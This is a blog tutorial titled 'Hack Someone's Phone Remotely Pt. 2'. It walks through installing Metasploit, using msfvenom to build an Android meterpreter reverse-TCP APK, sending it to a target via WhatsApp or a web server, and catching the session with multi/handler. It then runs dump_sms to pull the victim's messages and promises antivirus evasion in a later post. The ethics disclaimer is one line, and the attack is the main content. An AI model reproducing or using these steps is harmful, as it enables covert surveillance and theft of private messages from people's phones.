September 16, 2022
Hack Someone’s Phone Remotely Pt. 2
It would be best if you kept in mind the alerts and suspicious functioning of your phone to make sure that it is not hacked. But it is…

By Piyush Yadav
4 min read
It would be best if you kept in mind the alerts and suspicious functioning of your phone to make sure that it is not hacked. But it is impossible to prevent yourself from hacking if you don't know how it works. Hacking can be said ethical when it is done with the target's permission and unethical when it is done without knowing the target. This blog is part 2 of the previous hacking blog with updated and limitless features.
Nowadays, every task is performed with the help of mobile phones. These smartphones have become the common targets for most of the hackers in the world. Despite all the efforts by companies to prevent the presence of malware, there are still many ways to hack a smartphone.
In this blog let us hack new mobiles phone easily. We will be using Hacking methods like phishing, penetrating, and reverse-engineering. Sit Tight until the end of the blog.
Prerequisites
- Linux OS
- Your System IP Address
- Internet Connection
Let's start
- Open the terminal
- Enter the following command to add the build repository and install the Metasploit framework
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstallcurl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstallNote — If you are using Kali Linux then there is no need to install it because it is pre-installed in kali Linux.
- After the installation is complete, Start the msfconsole
./msfconsole./msfconsole- After starting and configuring a few things, you can exit from that terminal
- We will be creating a virus-based apk for a target.
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.00.144 LPORT=8000 > /home/piyushyadav0191/Desktop/test.apkmsfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.00.144 LPORT=8000 > /home/piyushyadav0191/Desktop/test.apk
A brief explanation of the above parameters
msfvenom — It can make malicious executable files like apk, exe, pdf, mkv, mp4 and other formats.
p — stands for payload which transfers data between two machines.
android/meterpreter/reverse_tcp — Run a meterpreter server in Android.
LHOST — It requires your IP address in your system
Note: You can acquire your IP address by typing the following command
ifconfigifconfig
LPORT — Port number
> path/test.apk — Where do you want to install it?
- After executing the msfvenom command, it should look like this
- Send your apk to target via Nginx/apache or WhatsApp
- Start msfconsole with root permission
sudo msfconsolesudo msfconsole- Type the following command to use the exploit
use exploit/mutli/handleruse exploit/mutli/handler
- set the payload to reverse TCP
set payload android/meterpreter/reverse_tcpset payload android/meterpreter/reverse_tcp
- Type the following command to show the options required for the next step
show optionsshow options
- There are two parameters i.e., LHOST and LPORT which we need to set, and these should be the same as we set them while we were using msfvenom.
- Type the following command to set your IP address to LHOST
set LHOST 192.168.XX.XXXset LHOST 192.168.XX.XXX- Type the following command to set your port number to LPORT
set LPORT 8000set LPORT 8000
- We need the sessions to exit when we only exit from our terminal, to do that type the command below below
set ExitOnSession falseset ExitOnSession false- Let's start our exploit attack
exploit -jexploit -j
- Install the apk in the target phone and give all permissions it requires and the session will start automatically
- After that, it should look like the image shown
- Type the following command to check which sessions are running
sessions -isessions -i- After choosing the highest numbered session number id and clicking enter
sessions -i 7sessions -i 7
Cool, you are in !!!
- Type help to get commands for fetching information from the target phone.
- Let's get an SMS from the target's phone
dump_smsdump_sms
Fetched all 40 SMS messages from my phone
Why was the need of Hack Someone's Phone remotely Pt.2 ?
In the Pt.1, we were using old method to hack mobile phone which is outdated and had few hacking features. That is the result of why we have Pt.2 with updated knowledge.
What's Next?
One thing you noticed is that when we install our apk in the target phone then the antivirus installed in the phone detects that apk and notifies the target that a malicious app is installed. In the Next Blog, We will be creating an original apk and inserting our malicious app into that app. By doing that, Not even antivirus can differentiate it from the original apk. HEHE!!!!㋡